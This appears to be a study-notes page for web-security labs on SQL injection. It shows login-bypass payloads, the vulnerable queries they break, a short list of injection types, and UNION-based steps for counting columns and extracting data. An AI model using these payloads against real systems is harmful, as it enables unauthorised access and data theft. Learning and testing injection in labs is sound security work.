PSG SQL
Basic SQL Login Auth bypass
Note : If inside burp repeater
, remember to CTRL + U
to format the payload
burp repeater
, remember to CTRL + U
to format the payload
' order by 1 --
' order by 1 --
will become
will become
'+order+by+1+--
'+order+by+1+--
Vuln code
`SELECT * FROM users WHERE username = 'wiener' AND password = 'bluecheese'`
Crafting
SELECT * FROM users WHERE username = 'administrator' --' AND password = 'bluecheese'
SELECT * FROM users WHERE username = '' OR 1=1 --' AND password = 'bluecheese'
Exploit Delivery
administrator' --
' OR 1=1 --
Type of SQL injections

inband SQLi
: you get response akanormal sqli
inferential SQLi
: you don't get response akablind sqli
Out-of-band-SQLi
: your use aServer
as man in middle send back the response to u
UNION attack to retreive data from other table
Vuln code
select * from categoryTable where category='Coporate Gifts'
select * from categoryTable where category='Coporate Gifts'
Determine number of columns
' order by 1 --
' order by 2 --
Combine order by
with select
query
select * from categoryTable where category='' order by 1 --anything here gets ignored
UNION SELECT
can be used to double check the number of columns
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
Ensure same Data type
'a' , 'a'
123 , 'a123'
characters?
alphanumeric?
numbers?
Last updated
Was this helpful?